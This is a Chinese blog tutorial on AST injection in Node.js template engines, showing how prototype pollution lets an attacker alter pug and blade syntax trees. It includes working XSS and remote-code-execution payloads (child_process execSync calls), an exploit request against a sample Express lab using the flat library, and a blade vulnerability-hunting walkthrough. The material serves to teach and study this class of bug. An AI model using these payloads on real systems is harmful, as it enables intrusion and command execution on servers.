一篇文章带你理解AST Injection

最新推荐文章于 2024-11-02 19:19:35 发布
最新推荐文章于 2024-11-02 19:19:35 发布
阅读量166 收藏
点赞数 2
文章标签: javascript 开发语言 ecmascript 学习 服务器 前端 pandas
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luoxiayan/article/details/133383080
版权

一文带你理解AST Injection

模版引擎是什么

JS web开发中常用的模版引擎如 ejs、pug、handlebars
功能:动态渲染HTML代码,创建可重复使用的页面结构

ejs 模版使用

// 安装EJS模块:npm install ejs

// 引入EJS模块
const ejs = require(‘ejs’);

// 定义模板
const template = `

Hello, <%= name %>!

`;

// 渲染模板
const data = { name: ‘John’ };
const html = ejs.render(template, data);

console.log(html);
handlebars 模版使用

// 安装Handlebars模块:npm install handlebars

// 引入Handlebars模块
const handlebars = require(‘handlebars’);

// 定义模板
const template = `

Hello, {{name}}!

`;

// 编译模板
const compiledTemplate = handlebars.compile(template);

// 渲染模板
const data = { name: ‘John’ };
const html = compiledTemplate(data);

console.log(html);
pug 模版使用

// 安装Pug模块:npm install pug

// 引入Pug模块
const pug = require(‘pug’);

// 定义模板
const template = h1 Hello, #{name}!;

// 编译模板
const compiledTemplate = pug.compile(template);

// 渲染模板
const data = { name: ‘John’ };
const html = compiledTemplate(data);

console.log(html);
总结:可以看到模版引擎其实都有各自的一些特定语法规则,比如 pug 中可以通过 #{name} 来引用外部环境的变量, ejs 则是 <%= name %>。通过这种方式简化html代码的编写,同时实现模版重用

模版引擎的工作原理

本质上,引擎是通过针对你使用模版语言编写的模版进行解析,从而生成新的JS代码。大体过程可以概括如下:

词法解析 -> 语法解析 -> 代码生成

但是在语法树处理的过程中,在处理节点的时候,存在大量的赋值、循环操作,而在大部分模版引擎中,都是这么写的:

attrs[name] = attrs[value]

if(ast.block){

}

for(var i in node){

}
赋值操作未判断对应的属性是否为对象自身的属性,导致访问到原型链的 Object.prototype 的属性
判断某个属性是否存在,同样未判断是否为对象自身属性是否存在,若存在原型链污染,则可以进入if判断
JS的 for…in 循环会遍历对象的所有可枚举属性,包括原型链上的属性。例如:
let obj = { a: 1, b: 2 };
obj.proto.c = 3;
for (let i in obj) {
console.log(i); // a, b, c
}
因此若存在原型链污染,则可以随意修改AST树,进而影响生成的代码,最终达到RCE(远程代码执行)的目的

需要注意的是:

AST树的生成本质上是影响生成的字符串,因此也可以导致XSS漏洞
代码执行的那一步才会导致RCE,这时候需要第一步通过原型链污染注入代码,进而影响生成的代码

pug template AST injection 示例

const pug = require(‘pug’);

// 模拟原型链污染
Object.prototype.block = {“type”:“Text”,“val”:<script>alert(origin)</script>};

const source = h1= msg;

var fn = pug.compile(source, {});
var html = fn({msg: ‘It works’});

console.log(html); //

It works


当执行到 fn({msg: ‘It works’}); 这一步的时候,本质上是进入了一段函数

打印出这段函数的代码,可以看到通过原型链污染我们实现了向生成代码中插入一段字符串

(function anonymous(pug
) {
function template(locals) {var pug_html = “”, pug_mixins = {}, pug_interp;var pug_debug_filename, pug_debug_line;try {;
var locals_for_with = (locals || {});

(function (msg) {
  ;pug_debug_line = 1;

pug_html = pug_html + “\u003Ch1\u003E”;
;pug_debug_line = 1;
pug_html = pug_html + (pug.escape(null == (pug_interp = msg) ? “” : pug_interp)) + “\u003Cscript\u003Ealert(origin)\u003C\u002Fscript\u003E\u003C\u002Fh1\u003E”;
}.call(this, “msg” in locals_for_with ?
locals_for_with.msg :
typeof msg !== ‘undefined’ ? msg : undefined));
;} catch (err) {pug.rethrow(err, pug_debug_filename, pug_debug_line);};return pug_html;}
return template;
})

AST Injection原理分析(以pug为例)

语法树结构
pug 解析 h1= msg ,生成的语法树结构:

{
“type”:“Block”,
“nodes”:[
{
“type”:“Tag”,
“name”:“h1”,
“selfClosing”:false,
“block”:{
“type”:“Block”,
“nodes”:[
{
“type”:“Code”,
“val”:“msg”,
“buffer”:true,
“mustEscape”:true,
“isInline”:true,
“line”:1,
“column”:3
}
],
“line”:1
},
“attrs”:[

        ],
        "attributeBlocks":[

        ],
        "isInline":false,
        "line":1,
        "column":1
    }
],
"line":0

}
语法树生成后,会调用 walkAst 执行语法树的解析过程,依次对每个节点的类型进行判断,即如下代码:

function walkAST(ast, before, after, options){

parents.unshift(ast);

switch (ast.type) {
    case 'NamedBlock':
    case 'Block':
      ast.nodes = walkAndMergeNodes(ast.nodes);
      break;
    case 'Case':
    case 'Filter':
    case 'Mixin':
    case 'Tag':
    case 'InterpolatedTag':
    case 'When':
    case 'Code':
    case 'While':
      if (ast.block) { // 注意这里
        ast.block = walkAST(ast.block, before, after, options);
      }
      break;
    case 'Text':
      break;
}
parents.shift();

}

语法树执行顺序

以刚刚生成的语法树结构举例,解析顺序为:

Block
Tag
Block
Code
…?
注意第4步解析 node.Type 为 Code 类型,会执行如下代码:

case ‘Code’:
case ‘While’:
if (ast.block) { // 注意这里
ast.block = walkAST(ast.block, before, after, options);
}
判断 ast.block 属性是否存在,此处的 ast 即当前ast语法树的节点
如果存在,继续递归解析 block

结合原型链污染

如果某处存在原型链污染漏洞,使得

Object.prototype.block = {“type”:“Text”,“val”:<script>alert(origin)</script>};
那么 ast.block 就会访问到 ast.proto.block ,即Object.prototype.block 的属性

此时代码输出结果,导致了XSS

const pug = require(‘pug’);

Object.prototype.block = {“type”:“Text”,“val”:<script>alert(origin)</script>};

const source = h1= msg;

var fn = pug.compile(source, {});
var html = fn({msg: ‘It works’});

console.log(html); //

It works

RCE

我们知道pug本质上是将一段代码,如 h1 =msg 编译为一段js代码,背后其实就是生成语法树+ new Function

因此如果能通过AST Injection插入节点,并使之成为代码,即可达到远程代码执行的目的。

刚好pug中就有如下代码:

// /node_modules/pug-code-gen/index.js

if (debug && node.debug !== false && node.type !== ‘Block’) {
if (node.line) {
var js = ';pug_debug_line = ’ + node.line;
if (node.filename)
js += ';pug_debug_filename = ’ + stringify(node.filename);
this.buf.push(js + ‘;’);
}
}
那么我们通过 AST Injection + Prototype Pollution 即可实现RCE

const pug = require(‘pug’);

Object.prototype.block = {“type”:“Text”,“line”:console.log(process.mainModule.require('child_process').execSync('id').toString())};

const source = h1= msg;

var fn = pug.compile(source, {});
var html = fn({msg: ‘It works’});

console.log(html);

Attack example

express 开发的web服务,其中一个CGI如下:
(注,镜像已经上传,本地有docker环境可直接运行 docker run -d --restart=always -p 8007:1337 rayepeng/blitzprop:latest )

router.post(‘/api/submit’, (req, res) => {
const { song } = unflatten(req.body);

if (song.name.includes('Not Polluting with the boys') || song.name.includes('ASTa la vista baby') || song.name.includes('The Galactic Rhymes') || song.name.includes('The Goose went wild')) {
    return res.json({
        'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user:'guest' })
    });
} else {
    return res.json({
        'response': 'Please provide us with the name of an existing song.'
    });
}

});
本地跑起来后运行在1337端口:
在这里插入图片描述

原型链污染

注意到这一行代码:

const { song } = unflatten(req.body);
unflatten 这个库存在原型链污染

var unflatten = require(‘flat’).unflatten;
unflatten({ ‘proto.polluted’: true });
console.log(this.polluted); // true

AST Injection

注意到这一行代码:

pug.compile(‘span Hello #{user}, thank you for letting us know!’)({ user:‘guest’ })
结合原型链污染,可以实现RCE

{
“song.name”: “The Goose went wild”,
proto.block”:{
“type”:“Text”,
“line”:“process.mainModule.require(‘child_process’).exec(‘/System/Applications/Calculator.app/Contents/MacOS/Calculator’)” // 可以执行任意命令
}
}
接下来实际分析一个模版引擎的漏洞挖掘案例:

blade漏洞挖掘实例

除去上文介绍的三种模版引擎,blade 也是常用的一种,安装方法

npm install blade
编写一个示例:

const blade = require(‘blade’);

const template = html head title Blade body #nav ul - for(var i in nav) li a(href=nav[i])= i #content.center h1 Blade is cool;
blade.compile(template, {‘debug’: true}, function(err, tmpl) {
console.log(err);
});
正常得到的语法树为:

{
doctypes: [],
nodes: [
{
type: ‘tag’,
name: ‘html’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘head’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘title’,
id: null,
classes: [],
attributes: {},
children: [ { escape: true, type: ‘text’, text: ‘Blade’ } ],
line: 3,
col: 9
}
],
line: 2,
col: 5
},
{
type: ‘tag’,
name: ‘body’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘div’,
id: ‘nav’,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘ul’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘code’,
code: ‘for(var i in nav)’,
multiline: false,
children: [
{
type: ‘tag’,
name: ‘li’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘a’,
id: null,
classes: [],
attributes: { href: [Object] },
children: [ [Object] ],
line: 9,
col: 25
}
],
line: 8,
col: 21
}
],
line: 7,
col: 17
}
],
line: 6,
col: 13
}
],
line: 5,
col: 9
},
{
type: ‘tag’,
name: ‘div’,
id: ‘content’,
classes: [ ‘center’ ],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘h1’,
id: null,
classes: [],
attributes: {},
children: [
{
escape: true,
type: ‘text’,
text: ‘Blade is cool’
}
],
line: 11,
col: 13
}
],
line: 10,
col: 9
}
],
line: 4,
col: 5
}
],
line: 1,
col: 1
}
]
}
既然是挖掘AST Injection,此时我们假设随便给 Object.prototype 污染个属性

Object.prototype.otherprop = {‘test’: ‘test’};
此时得到的语法树变成了如下,且代码运行报错:

{
doctypes: [],
nodes: [
{
type: ‘tag’,
name: ‘html’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘head’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘title’,
id: null,
classes: [],
attributes: {},
children: [ { escape: true, type: ‘text’, text: ‘Blade’ } ],
line: 3,
col: 9
}
],
line: 2,
col: 5
},
{
type: ‘tag’,
name: ‘body’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘div’,
id: ‘nav’,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘ul’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘code’,
code: ‘for(var i in nav)’,
multiline: false,
children: [
{
type: ‘tag’,
name: ‘li’,
id: null,
classes: [],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘a’,
id: null,
classes: [],
attributes: { href: [Object], undefined: undefined },
children: [ [Object] ],
line: 9,
col: 25
}
],
line: 8,
col: 21
}
],
line: 7,
col: 17
}
],
line: 6,
col: 13
}
],
line: 5,
col: 9
},
{
type: ‘tag’,
name: ‘div’,
id: ‘content’,
classes: [ ‘center’ ],
attributes: {},
children: [
{
type: ‘tag’,
name: ‘h1’,
id: null,
classes: [],
attributes: {},
children: [
{
escape: true,
type: ‘text’,
text: ‘Blade is cool’
}
],
line: 11,
col: 13
}
],
line: 10,
col: 9
}
],
line: 4,
col: 5
}
],
line: 1,
col: 1
}
]
}
注意到出现在第9行处理代码的时候:

children: [
{
type: ‘tag’,
name: ‘a’,
id: null,
classes: [],
attributes: { href: [Object], undefined: undefined },
children: [ [Object] ],
line: 9,
col: 25
出现了一个 undefined 的属性,这里是怎么来的呢?

以及,堆栈报错,可以作为辅助漏洞挖掘的信息

TypeError: Compile error: Cannot read properties of undefined (reading ‘text’)
at 

at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:309:17)
at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:356:12)
at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:486:11)
at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:356:12)
at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:356:12)
at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:356:12)
at Compiler._compileNode (/..../js-ast-injection/node_modules/blade/lib/compiler.js:356:12)
at Compiler.compile (/..../js-ast-injection/node_modules/blade/lib/compiler.js:114:9)
at Object.compile (/..../js-ast-injection/node_modules/blade/lib/blade.js:57:12)
at Object.<anonymous> (/..../js-ast-injection/blade1.js:23:7) {

source: ‘html\n’ +
’ head\n’ +
’ title Blade\n’ +
’ body\n’ +
’ #nav\n’ +
’ ul\n’ +
’ - for(var i in nav)\n’ +
’ li\n’ +
’ a(href=nav[i])= i\n’ +
’ #content.center\n’ +
’ h1 Blade is cool’,
column: undefined,
lastFilename: undefined,
filename: undefined,
line: undefined
}

代码分析

Blade模版引擎的处理流程和其他模版引擎类似,如下过程:代码 ->词法分析 -> ast 树 -> code-gen
单纯从堆栈信息,只能看到处理语法树时候遇到的报错,具体在这里:

for(var i in attrs)
{
//interpolate text attributes
if(attrs[i].text)
{
var stringified = JSON.stringify(attrs[i].text),
interpolated = bladeutil.interpolate(stringified, ns);
//check to see if this text attribute needs to be interpolated
if(interpolated != stringified)
{
delete attrs[i].text;
attrs[i].code = interpolated;
}
}
因为 attrs[i].text 显然是去访问一个 undefined 的属性,所以就会报错,这里无法获得更多信息了,只能动态调试代码去分析了。

调用栈分析

blade.compile 函数跟进,会调用到内部模块的 parse
跟进 parser.parse 函数
在这里插入图片描述

文件位于: node_modules/blade/lib/parser/index.js

通过闭包导出了个函数:
在这里插入图片描述

跟进我们想要的函数,从函数命名上可以看出就是在利用堆栈去处理字符串,生成ast树,基本的编译原理了属于是
在这里插入图片描述

我们只关注 attributes 的处理,找到对应的函数, parse_attribute
在这里插入图片描述

这行代码:

result0 = (function(offset, line, column, name, escape, value) {
return {
‘name’: name,
‘value’: {
‘escape’: escape != “!”,
‘code’: value
}
};
})(pos0.offset, pos0.line, pos0.column, result0[0], result0[1], result0[3]);
就是返回一个属性的对象,这个是符合正常逻辑的

但是此时还没有看到我们想搞明白的 undefined 属性是怎么出现的,不急

我们先从函数这个返回, 因为我们知道生成的这个属性肯定是要加到对应的ast树上的

果然,从 parse_attribute 返回,经过了一段处理代码之后,到达了这一处:
在这里插入图片描述

result0 = (function(offset, line, column, first_attr, next_attrs) {
var attrs = {};
attrs[first_attr.name] = first_attr.value;
for(var i in next_attrs)
attrs[next_attrs[i].name] = next_attrs[i].value;
return attrs;
})(pos0.offset, pos0.line, pos0.column, result0[3], result0[4]);
其中: attrs[first_attr.name] = first_attr.value;
在这里插入图片描述

赋值完后,还有一个循环,刚好能够取出原型链中的属性,实现 ast injeciton
在这里插入图片描述

如下图:注意到 i 就是原型链中的属性

在这里插入图片描述

这样我们就明白了为啥导致AST树中出现 undefined ,我们只需要加入name 和 value 属性即可

Object.prototype.otherprop = {‘code’: ‘console.log(1)’, “name”: “abc”, “value”: “def”};

RCE

既然可以注入任意属性了,那我们就可以利用这一点,向 attributes 中写入代码

注意到在处理AST生成代码的过程中,会处理 code 的属性
在这里插入图片描述

for(var i in attrs)
{
//interpolate text attributes
if(attrs[i].text)
{
var stringified = JSON.stringify(attrs[i].text),
interpolated = bladeutil.interpolate(stringified, ns);
//check to see if this text attribute needs to be interpolated
if(interpolated != stringified)
{
delete attrs[i].text;
attrs[i].code = interpolated;
}
}
//take care of text attributes here
if(attrs[i].text != null)
{
if(attrs[i].escape)
this._push(“’ " + i + “=” + bladeutil.quote(
JSON.stringify(runtime.escape(attrs[i].text)) ) + “'”);
else
this._push(”’ " + i + “=” + bladeutil.quote(
JSON.stringify(attrs[i].text) ) + “'”);
}
//take care of code attributes here
// 在这里注入代码!!!
else
varAttrs += “,” + JSON.stringify(i) + “:{v:” + attrs[i].code +
(attrs[i].escape ? “,e:1” : “”) +
(i == “class” && attrs[i].append ?
“,a:” + JSON.stringify(attrs[i].append): “”) + “}”;
Payload如下,这样就能实现AST Injection+ RCE了!

Object.prototype.someprop = {
‘name’: ‘somename’,
‘value’: ‘somevalue’,
‘code’ : “process.mainModule.require(‘child_process’).execSync(whoami)”
};

「已注销」
关注
前端常见面试-vue篇
fly_home_ysc的博客
03-09 590
        前面,我们已经针对前端的基础知识和常见的一些进阶知识都做了整体的梳理,并且也对缓存进行了单独的具体讲解,有需要的朋友可自行查看相关的文章文章如下:前端常见面试-css篇、前端常见面试-js篇、前端常见面试-进阶篇、前端常见面试-存储/缓存篇      ...
一款轻量级开源SAST工具semgrep的分析
南迪叶先森
07-13 1420
公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! 整个中文网络对semgrep的信息之少,竟然只找到一篇内容还过得去的文章:介绍semgrep扫描xss漏洞,而且读起来还像是翻译的。这般待遇实在是与semgrep的强大和在国外的流行完全匹配不上,再加上近期团队做安全编码规范的配套扫描工具建设,从而催生了本文。 简介 semgrep是一款基于Facebook开源SAST工具pfff中的sgrep组件开发的开源SAST工具,目前由安全公司r2c统一开发维护,走的是开源共建模式,主打轻量.
【架构视角】一篇文章你彻底吃透Spring
萌兔兔MMQ!!
04-29 800
框架的意义 对于程序员来说,我们通常知道很多概念,例如组件、模块、系统、框架、架构等,而本文我们重点说 框架。 框架,本质上是一些实用经验集合。即是前辈们在实际开发过程中积攒下来的实战经验,累积成一套实用工具,避免你在开发过程中重复去造轮子,特别是帮你把日常中能遇到的场景或问题都给屏蔽掉,框架的意义在于屏蔽掉开发的基础复杂度、屏蔽掉此类共性的东西,同时建立严格的编码规范,让框架使用者开箱即用,并且只需要关注差异面,即业务层面的实现。简而言之,框架只干一件事,那就是简化开发。然后在此基础上,可能会再考虑一些安
go技术文章梳理(2017)
韩亚军的博客
06-22 5万+
gocn_news_2017-12-31 分布式系统下的Go channels https://medium.com/@matryer/introducing-vice-go-channels-across-many-machines-bcac1147d7e2 Go Socket编程之teleport框架是怎样炼成的 https://www.jianshu.com/p/7120...
Python 潮流周刊#30:非洲 Python 社区给 PSF 的一封公开信
Python猫
12-09 1211
△△请给“Python猫”加星标,以免错过文章推送你好,我是猫哥。这里每周分享优质的 Python、AI 及通用技术内容,大部分为英文。本周刊开源,欢迎投稿[1]。另有电报频道[2]作为副刊,补充发布更加丰富的资讯。????播客推荐2023 年即将过去,给大家推荐一下我个人年度最喜爱的播客节目《纵横四海[3]》!!它主要分享读书,探讨个人成长/职业成长,探索如何处理感情问题等。每期都在 90 分钟以上...
学会这样写代码,一看就是资深工程师,代码简洁之道PHP版本
黑夜开发者的博客
06-06 983
PHP快速入门与实战写代码是一种职业,每个人对写代码的理解不一样,代码水平也不一样,编写简洁的可读性代码不仅让自己很有成就感,也能提升别人对你的认识,同时也对整个项目的质量有着非常可靠的保证。不过写好代码并不是一件十分容易的事情,本文就从多年代码写作经验以及业内普遍认识出发,介绍一些常见的代码简洁之道。供大家一起交流学习
code representation-CPG
qq_44370676的博客
07-12 2085
Modeling and Discovering Vulnerabilities with Code Property Graphs一.背景二.程序表示2.1 AST参考文献 之前提到过许多代码漏洞检测方法都会用到图表示和图神经网络,但对这些图的来源开始缺少探索,今天来探索下。 一.背景 CPG(代码属性图)是2014年提出来了,不过现在很多对漏洞的研究依旧是基于它的。CPG是结合AST(抽象语法树),CFG(控制流图),PDG(程序依赖图)3种代码表示的一种联合表示方法。并且在这篇文章里,作者试图通过图的
idea插件开发(3)-插件开发基础
编程是一门实践技术
05-16 628
上两篇文章主要描述了idea插件工程创建和idea插件的配置,本文继承上述两篇文章,详细描述下插件开发基础的第三块内容。也是开发具体插件功能前必须要了解的内容,否则开发过程中有可能会经常卡壳。
go技术文章精选(2019)
热门推荐
韩亚军的博客
01-03 11万+
gocn_news_set_2019 gocn_news_2019-12-31 Go 系列教程:https://dev.to/digitalocean/how-to-code-in-go-32p0 Go modules:最小版本选择 https://tonybai.com/2019/12/21/go-modules-minimal-version-selection/ 部署服...
AST-injection-ctf:在Nodejs应用中演示AST注入
04-23
AST注射CTF 在Nodejs应用中演示AST注入。 需要Docker和docker-compose! 生成Node.js应用程序映像 docker build -t demo-ctf . 构建映像时忽略所有红线:))) 泊坞窗组成 docker-compose up -d 运行应用 转到本地...
Vue AST源码解析第一篇
08-29
本篇文章将聚焦于Vue AST源码解析的第一部分,特别是与DOM操作相关的部分。 首先,Vue实例的初始化过程始于`_init`函数,它负责大量初始化工作。当`vm.$options.el`存在时,Vue会调用`$mount`方法来挂载实例到指定...
astexplorer:一种Web工具,用于探索由各种解析器生成的AST
02-02
由于支持将来的语法,因此对于想要创建AST转换的开发人员来说,AST资源管理器是一个有用的工具。 实际上,其中包含以下转换器,因此您可以原型自己的插件: JavaScript (v5,v6) (v1,v2,v3) HTML CSS MDX...
aspeed AST2500/AST2520 v16水印 datasheet
06-18
2. 环保标准:AST2500和AST2520符合欧盟的RoHS(限制使用某些有害物质指令)标准,是一种环境友好的电子产品。 3. 贴片类型:这两款处理器均使用无铅贴片技术。 4. 应用领域:ASPEED的产品并不适合用于生命支持设备...
CesiumJS 案例 P12:添加指定长宽的图片图层并居中显示(圆点分别为图片图层的中心点、左上角顶点、右上角顶点、左下角顶点、右下角顶点)
weixin_52173250的博客
10-30 1130
CesiumJS 案例 P12:添加指定长宽的图片图层并居中显示(圆点分别为图片图层的中心点、左上角顶点、右上角顶点、左下角顶点、右下角顶点)
JavaScript 生成二维码
qq_30049249的博客
11-02 123
我试过了,这一款js库支持中英文混合。进入网站后,可以直接点击运行哟~
基于vue框架的的汇生活家居商城的设计与实现bdjlq(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
h2345678的博客
10-29 1368
项目功能:商品分类,商品信息,用户。
JavaScript中this的指向和改变this指向的方法 - 2024最新版前端秋招面试短期突击面试题【100道】
everfoot的博客
10-29 680
了解this的工作原理是掌握JavaScript的关键之一,特别是在编写复杂的应用程序时。正确使用this可以避免许多常见的问题和错误。在实际开发中,合理选择不同的绑定方法,可以让你的代码更加灵活和易于维护。掌握这些this的知识点将帮助你在前端面试中脱颖而出!祝你顺利上岸!
echarts 遍历多个图表,并添加resize缩放
licongmingli的博客
10-30 224
遍历echarst多个图表,并添加独立的缩放函数
基于SpringBoot+Vue的快递物流信息查询系统设计与实现【前后端分离】
最新发布
m0_67428300的博客
11-02 607
随着电子商务的快速发展,快递物流系统的重要性愈发突出。针对用户对快递信息的实时查询需求,本系统结合Spring Boot和Vue技术,设计并实现了一个高效、易用的快递物流信息查询系统。系统实现了用户信息管理、订单查询、物流跟踪等功能,用户可通过简单操作即可查询快递状态,实现信息的实时展示。本快递物流信息查询系统基于Spring Boot与Vue的开发,前后端分离架构提升了系统的扩展性和开发效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值